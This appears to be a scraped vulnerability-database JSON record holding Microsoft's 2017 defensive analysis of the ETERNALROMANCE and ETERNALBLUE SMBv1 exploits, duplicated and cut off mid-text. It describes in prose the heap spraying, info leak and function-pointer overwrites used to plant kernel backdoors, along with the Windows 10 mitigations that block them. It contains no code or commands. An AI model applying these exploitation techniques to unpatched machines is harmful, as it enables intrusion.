Update provides next-gen ransomware protection](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)\n\n[Analysis of the ETERNALBLUE and ETERNALROMANCE exploits leaked by Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>)\n\n \n\nUpdates:\n\nJune 20, 2017 - added reference to analysis of exploits leaked by Shadow Brokers", "title": "WannaCrypt ransomware worm targets out-of-date systems", "cvelist": ["CVE-2017-0145"], "_object_type": "robots.models.rss.RssBulletin", "viewCount": 245, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": 
["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2017-09-15T09:08:41", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2017-09-15T09:08:41", "rev": 2}}, "reporter": "msft-mmpc", "bulletinFamily": "blog", "objectVersion": "1.5", "type": "mmpc", "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, 
"obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hash": "ffe6cb6fb3b4433654ce1ac7d3d0f70bb6f55b5c0d3112727381b9d8896a525f", "hashmap": [{"key": "bulletinFamily", "hash": "126ac9f6149081eb0e97c2e939eaad52"}, {"key": "cvelist", "hash": "6e85843f0a1ea97153b93d90b1fbe01c"}, {"key": "cvss", "hash": "2076413bdcb42307d016f5286cbae795"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "e8ece5e56bdd3732ba7cab6279f9f4ba"}, {"key": "href", "hash": "7ffd9eda0c71ce3b65053213385512d5"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "2539359a3785695f4c56ccf35c614000"}, {"key": "published", "hash": "2539359a3785695f4c56ccf35c614000"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9158c03164fb6db0c440fdb287e68855"}, {"key": "title", "hash": "69654611badaced3e365c04618737412"}, {"key": "type", "hash": "2206031ddfa442c2eb57dd17e9fcf174"}], "scheme": null}, {"cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "references": [], "enchantments_done": [], "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "id": 
"MMPC:C211C70545FBDF88C2F99362DC4608A8", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "description": "![](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers.jpg)\n\nOn April 14, a group calling themselves the Shadow Brokers caught the attention of the security community by [releasing a set of weaponized exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>). Shortly thereafter, one of these exploits was used to create wormable malware that we now know as [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>), which targeted a large number of out-of-date systems and held encrypted files for ransom.\n\nAlthough the exploits are ineffective on newer platforms or attempt to take advantage of already patched vulnerabilities, they nevertheless provide an opportunity to analyze and evaluate whether the exploitation techniques used are still viable on Windows 10 systems with Creators Update.\n\nIn Windows 10, key security enhancements such as kernel Address Space Layout Randomization ([kASLR](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), kernel Data Execution Prevention ([DEP](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), and virtualization-based security (VBS) capabilities delivered with [Device Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/deploy-device-guard-enable-virtualization-based-security>) all contribute to breaking the exploit techniques observed in the wild. Through VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that's mapped in the kernel address space. 
Alongside Device Guard is the new kernel [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (kCFG) introduced with Windows 10 Creators Update. kCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\n\nIn this blog, we provide an in-depth analysis of two of the exploits released by the Shadow Brokers. Both exploits allow arbitrary code execution through vulnerabilities in the Server Message Block (SMBv1) file-sharing server implementation.\n\nWe follow with a discussion about how Device Guard and kCFG prevent these exploits\u2014and many other exploits\u2014from installing backdoor implants in kernel memory.\n\n## The exploit kit\n\nThe kit\u2019s directory structure shows a modular exploitation framework, where payloads are kept separate from exploits.\n\n![Exploit kit directory structure](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-exploit-directory-structure.png)\n\n_Figure 1. Exploit kit directory structure_\n\nAll the binaries in the kit contain multiple strings that describe their purpose. Furthermore, the kit exports common functionality to DLL files, revealing additional information through referenced function names. While the strings and the function calls were not necessary for us to examine the kit, both helped speed up our initial analysis.\n\nFor more information about the individual exploits in the kit that targeted Microsoft products, refer to the [blog post from Microsoft Security Response Center](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n## ETERNALROMANCE SMB exploit\n\nLet\u2019s dig into the guts of one of the exploits in the kit.\n\nETERNALROMANCE is a remote code execution (RCE) exploit against the legacy SMBv1 file sharing protocol. 
It takes advantage of [CVE-2017-0145](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which has been patched with the [MS17-010 security bulletin](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). One might note that file sharing over SMB is normally used only within local networks and that the SMB ports are typically blocked from the internet at the firewall. However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a _type confusion_ vulnerability leading to an _attacker offset controlled_ arbitrary heap write. As with almost any _heap corruption_ exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\n\n### Getting a reliable heap layout\n\nThe exploit begins to spray the heap by starting several concurrent instances of [SMB_COM_TRANSACTION](<https://msdn.microsoft.com/en-us/library/ee441489.aspx>). The exploit binary supports three different heap spray methods, allowing it to deal with varying pool behaviors between Windows versions. Apart from the first few allocations (the exact number depends on the pool state), transaction objects are allocated with a fixed, predictable displacement from each other. After the spray has finished, the exploit uses an info leak in a _TRANS_PEEK_NMPIPE_ transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\nA network trace can quickly visualize what's going on:\n\n![Network packet containing leaked pool memory](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-network-packet-1024x515.png)\n\n_Figure 2. 
Network packet containing leaked pool memory_\n\n### Building primitives from heap corruption\n\nThe spray has placed many _TRANSACTION_ objects on the heap at a known distance from each other. And because the exploit has leaked the size of a pointer, it knows the offsets to all fields in the _TRANSACTION_ object. The exploit can now\u2014using carefully crafted offsets\u2014use the type _confusion out-of-bounds write_ from one object to corrupt an adjacent one.\n\nBy overwriting the ID associated with the victim object with a hardcoded number (zero), the exploit can now refer to the object without knowing what the original ID was.\n\n![Heap layout after the spray](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-heap-layout-after-spray-1024x307.png)\n\n_Figure 3. Heap layout after the spray_\n\nThe exploit proceeds to corrupt the transaction structure in a variety of ways, constructing arbitrary read-write (RW) primitives. It writes additional fields to prevent the transaction from being freed when consumed, allowing the exploit to continue reusing the same transaction for multiple requests without having to pick a new target object to corrupt.\n\n![InData pointer observed in WinDbg being overwritten by heap out-of-bounds write](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-data-pointer.png)\n\n_Figure 4. InData pointer observed in WinDbg being overwritten by heap out-of-bounds write_\n\n### Installing in-memory backdoor\n\nAt this point, the exploit code attempts to plant backdoor code inside the SMB driver. This step consists of copying shellcode into the non-paged pool, corrupting a function pointer to point to the shellcode and having that function pointer executed. Note that starting with Windows 8, SMB has moved to using non-executable pools, rendering this method ineffective on newer platforms.\n\nTo find a good spot for the function pointer, the exploit follows a pointer on the heap to reach the data segment. 
Scanning the data segment, it proceeds to look for a table of function pointers that is used to dispatch different _SMB_COM_TRANSACTION2_ subcommands to different functions.\n\nWhen it finds the table of function pointers, the exploit overwrites the 14th entry on this table, which corresponds to the _TRANS2_SESSION_SETUP_ subcommand. [MSDN documentation](<https://msdn.microsoft.com/en-us/library/ee441654.aspx>) describes this subcommand as reserved, making it an ideal candidate for triggering the backdoor as it is almost never present in SMB traffic.\n\nWhenever an SMB packet is sent with this subcommand ID to the target device, the function pointer gets executed, triggering the shellcode. This mechanism and the backdoor code are not persistent\u2014they require a persistent second-stage component to survive a reboot.\n\n![Decompiled code for planting the backdoor](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-decompiled-code-1024x889.png)\n\n_Figure 5. Decompiled code for planting the backdoor_\n\n## ETERNALBLUE SMB exploit\n\nThe WannaCrypt malware spreads by using an adapted version of the ETERNALBLUE exploit. This bug, which targets a different SMBv1 vulnerability, is a linear buffer overrun on the pool.\n\nThe bug occurs in a special case when converting a list of [extended attributes](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff545793\\(v=vs.85\\).aspx>) (EA) from one format to another. If the list contains an EA entry that goes outside the packet buffer, the list is truncated as if it only included up to the last valid entry.\n\nWhen updating the length of the list, the size is written to as if it were a 16-bit ushort, when it is actually a 32-bit ulong. This means that the upper 16-bits are not updated when the list gets truncated:\n\n![Size of list of extended attributes \\(EA\\)](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-list-truncated.png)\n\n_Figure 6. 
Size of list of extended attributes (EA)_\n\nThe code allocates a buffer with a size calculated to fit all EA entries up to the truncation. But as the list size was increased, this leads to a linear heap overflow with attacker-controlled data.\n\nIn a similar way as before, the heap is sprayed but this time with _srvnet!SRVBUFFER_ objects using the SMBv2 protocol. This object contains two key pointers that the exploit targets: an [MDL](<https://msdn.microsoft.com/en-us/library/windows/hardware/ff554414\\(v=vs.85\\).aspx>) pointer that receives network packet payload and a pointer to a _srvnet!SRVNET_CONNECTION_ object. Both pointers are overwritten so that they point to fixed addresses in the HAL region (used by the _hardware abstraction layer_).\n\nBecause of the corrupted MDL pointer, the next packet payload will get written to the HAL region. This payload contains shellcode and initializes the memory structure for a fake _srvnet!SRVNET_CONNECTION_ object. The connection object has a pointer to a _srvnet!SRVNET_CLIENT_CONNECTION_DISPATCH_ structure that contains function pointers.\n\nAfter the packet payload has been received, the _SRVNET_RECEIVE_HANDLER_ function pointer is executed from the attacker-controlled _srvnet!SRVNET_CLIENT_CONNECTION_DISPATCH_ structure, jumping to the shellcode.\n\nOn Windows 7, which is the system that the exploit targets, the HAL region is mapped as readable, writable, and executable. On newer systems the HAL region is no longer executable, meaning that the CPU would fault when trying to execute the shellcode. Furthermore, the HAL region and other kernel regions (such as page tables) have been randomized on the latest 64-bit versions of Windows 10, breaking assumptions of the 64-bit version in the ETERNALBLUE exploit.\n\n![Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-annotated-hal-region.png)\n\n_Figure 7. 
Annotated contents of the HAL region with the fake srvnet!SRVNET_CONNECTION object_\n\n## Mitigation with virtualization-based security\n\nVirtualization-based security (VBS) provided with Device Guard on Windows 10 and kCFG enhancements with Creators Update stop common exploitation techniques, including those utilized by ETERNALROMANCE and ETERNALBLUE.\n\n### Stopping shellcode execution with W^X enforcement\n\nOn systems that have [Device Guard VBS enabled](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/deploy-device-guard-enable-virtualization-based-security>), writing and then executing shellcode\u2014such as the ETERNALROMANCE backdoor\u2014in the kernel is not possible due to W^X enforcement policies in the hypervisor. These policies ensure that a kernel memory page is never both writable and executable at any given time.\n\nEven if an attacker tries to attack page tables, the hypervisor is still able to force the _execute-disable_ bit through [extended page tables (EPT)](<https://software.intel.com/sites/default/files/managed/2b/80/5-level_paging_white_paper.pdf>). This in turn forces attackers to rely on code-reuse methods, such as return-oriented programming (ROP). As a consequence, the shellcode implant library in the Shadow Brokers release is fundamentally incompatible with VBS-protected systems.\n\n### Preventing use of corrupt function pointers with kCFG\n\nIn [Windows 10 Creators Update](<https://www.microsoft.com/en-US/windows/features>), we introduced a new security mitigation in the kernel space for VBS-enabled systems. 
The kernel is now compiled with [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (CFG)\u2014a control flow integrity solution designed to prevent common stack-pivoting techniques that rely on corrupt function pointers or C++ virtual method tables.\n\nControl Flow Guard in the compiled kernel (also known as _kCFG_) aims to verify all indirect call targets before invoking them. This makes it harder for an attacker to execute code by abusing function pointers or other indirect calls.\n\nIn the case of the ETERNALROMANCE exploit, the subverted function pointer would lead to a security fault when invoked, making the exploit non-functional in its current form. The same applies for ETERNALBLUE, which also relies on a corrupted function pointer to achieve code execution.\n\n![With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-with-kCFG-enabled.png)\n\n_Figure 8. With kCFG enabled, the function pointer is now verified by __guard_dispatch_icall_ptr_\n\nOn early Windows 10 systems before Creators Update and without Device Guard, it is possible to attack the page tables of the HAL region to turn it executable and gain code execution using the ETERNALBLUE exploit technique.\n\n## Secure computing with Windows 10 Creators Update\n\nWhile we actively provide patches for vulnerabilities in services like SMBv1, we strive to deliver more and more system-wide mitigations that proactively protect our users from current, as well as future, exploitation and attack methods.\n\nCustomers who run Windows 10 Creators Update benefit from [Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/device-guard-deployment-guide>) and security enhancements like kCFG and W^X. 
They also benefit from a [host of other security features](<https://www.microsoft.com/en-us/WindowsForBusiness/Windows-security>) that have been strengthened with Windows 10 Creators Update, including:\n\n * [Windows Defender Antivirus](<https://www.microsoft.com/en-us/windows/windows-defender>) for endpoint antimalware protection powered by the Microsoft Intelligent Security Graph, which learns from [billions of devices worldwide](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>)\n * [Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) enables enterprises to detect breach activity early and respond fast; try it for free with Windows 10 Enterprise\n * [Microsoft Edge](<https://www.microsoft.com/en-au/windows/microsoft-edge>) is a proven fast browser secured by virtualization and by Windows Defender SmartScreen\n\n### Reducing exposure to SMBv1 exploits on older platforms\n\nMicrosoft strongly advises customers to apply all available security updates in a timely manner. 
To reduce the attack surface on your network, block inbound SMB traffic at the firewall and, if possible, [disable the SMBv1 compatibility driver](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>).\n\n \n\n_**Viktor Brange**_ \n_ Windows Offensive Security Research Team_", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-06-30T15:02:19", "references": [{"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"], "type": "mmpc"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["SMNTC-96705"], "type": "symantec"}, {"idList": ["MS:CVE-2017-0145"], "type": "mscve"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"], "type": "trendmicroblog"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["CVE-2017-0145"], "type": "cve"}], "rev": 2}, "score": {"modified": "2017-06-30T15:02:19", "rev": 2, "value": 6.9, "vector": "NONE"}}, "hash": "d69fe5eabc1a7c8f502269bc7e7a898f5aa04bfacdcac57727e9eafb534fcfc1", "hashmap": [{"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d8272541e029e5f0b1e77c3a06d01c06", "key": "href"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "6e85843f0a1ea97153b93d90b1fbe01c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "b943e3715f6c77878c82e1175d6fadd2", "key": "title"}, {"hash": "96d5a82c7285b01222a022efcc48cebd", "key": "published"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": 
"cvss2"}, {"hash": "4166d9c412dcd1fbbfeff20425ad5162", "key": "description"}, {"hash": "96d5a82c7285b01222a022efcc48cebd", "key": "modified"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/", "id": "MMPC:C211C70545FBDF88C2F99362DC4608A8", "immutableFields": [], "lastseen": "2017-06-30T15:02:19", "modified": "2017-06-16T18:17:03", "objectVersion": "1.5", "published": "2017-06-16T18:17:03", "references": [], "reporter": "msft-mmpc", "title": "Analysis of the Shadow Brokers release and mitigation with Windows 10 virtualization-based security", "type": "mmpc", "viewCount": 245}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-06-30T15:02:19"}], "modified": "2017-06-16T18:17:03", "lastseen": "2017-06-30T15:02:19", "published": "2017-06-16T18:17:03", "description": "![](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers.jpg)\n\nOn April 14, a group calling themselves the Shadow Brokers caught the attention of the security community by [releasing a set of weaponized exploits](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>). 
Shortly thereafter, one of these exploits was used to create wormable malware that we now know as [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>), which targeted a large number of out-of-date systems and held encrypted files for ransom.\n\nAlthough the exploits are ineffective on newer platforms or attempt to take advantage of already patched vulnerabilities, they nevertheless provide an opportunity to analyze and evaluate whether the exploitation techniques used are still viable on Windows 10 systems with Creators Update.\n\nIn Windows 10, key security enhancements such as kernel Address Space Layout Randomization ([kASLR](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), kernel Data Execution Prevention ([DEP](<https://www.blackhat.com/docs/us-16/materials/us-16-Weston-Windows-10-Mitigation-Improvements.pdf>)), and virtualization-based security (VBS) capabilities delivered with [Device Guard](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/deploy-device-guard-enable-virtualization-based-security>) all contribute to breaking the exploit techniques observed in the wild. Through VBS\u2019s usage of CPU hypervisor functionality, Device Guard-enabled systems can verify and enforce integrity of code that's mapped in the kernel address space. Alongside Device Guard is the new kernel [Control Flow Guard](<https://msdn.microsoft.com/en-us/library/windows/desktop/mt637065\\(v=vs.85\\).aspx>) (kCFG) introduced with Windows 10 Creators Update. kCFG prevents many exploitation techniques that rely on corrupting function pointers to achieve code execution.\n\nIn this blog, we provide an in-depth analysis of two of the exploits released by the Shadow Brokers. 
Both exploits allow arbitrary code execution through vulnerabilities in the Server Message Block (SMBv1) file-sharing server implementation.\n\nWe follow with a discussion about how Device Guard and kCFG prevent these exploits\u2014and many other exploits\u2014from installing backdoor implants in kernel memory.\n\n## The exploit kit\n\nThe kit\u2019s directory structure shows a modular exploitation framework, where payloads are kept separate from exploits.\n\n![Exploit kit directory structure](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-exploit-directory-structure.png)\n\n_Figure 1. Exploit kit directory structure_\n\nAll the binaries in the kit contain multiple strings that describe their purpose. Furthermore, the kit exports common functionality to DLL files, revealing additional information through referenced function names. While the strings and the function calls were not necessary for us to examine the kit, both helped speed up our initial analysis.\n\nFor more information about the individual exploits in the kit that targeted Microsoft products, refer to the [blog post from Microsoft Security Response Center](<https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/>).\n\n## ETERNALROMANCE SMB exploit\n\nLet\u2019s dig into the guts of one of the exploits in the kit.\n\nETERNALROMANCE is a remote code execution (RCE) exploit against the legacy SMBv1 file sharing protocol. It takes advantage of [CVE-2017-0145](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>), which has been patched with the [MS17-010 security bulletin](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>). One might note that file sharing over SMB is normally used only within local networks and that the SMB ports are typically blocked from the internet at the firewall. 
However, if an attacker has access to a vulnerable endpoint running SMB, the ability to run arbitrary code in kernel context from a remote location is a serious compromise.\n\nThis exploit was written to remotely install and launch an SMB backdoor. At the core of this exploit is a _type confusion_ vulnerability leading to an _attacker offset controlled_ arbitrary heap write. As with almost any _heap corruption_ exploit, the attacker must know or control the layout of the heap to consistently succeed. With SMB, most objects are allocated in the non-paged pool.\n\n### Getting a reliable heap layout\n\nThe exploit begins to spray the heap by starting several concurrent instances of [SMB_COM_TRANSACTION](<https://msdn.microsoft.com/en-us/library/ee441489.aspx>). The exploit binary supports three different heap spray methods, allowing it to deal with varying pool behaviors between Windows versions. Apart from the first few allocations (the exact number depends on the pool state), transaction objects are allocated with a fixed, predictable displacement from each other. After the spray has finished, the exploit uses an info leak in a _TRANS_PEEK_NMPIPE_ transaction. It uses the info leak to determine whether the target is running a 32- or 64-bit version of Windows and to get kernel pointers for various SMB objects.\n\nA network trace can quickly visualize what's going on:\n\n![Network packet containing leaked pool memory](https://msdnshared.blob.core.windows.net/media/2017/06/Shadowbrokers-network-packet-1024x515.png)\n\n_Figure 2. Network packet containing leaked pool memory_\n\n### Building primitives from heap corruption\n\nThe spray has placed many _TRANSACTION_ objects on the heap at a known distance from each other. And because the exploit has leaked the size of a pointer, it knows the offsets to all fields in the _TRANSACTION_ object. 
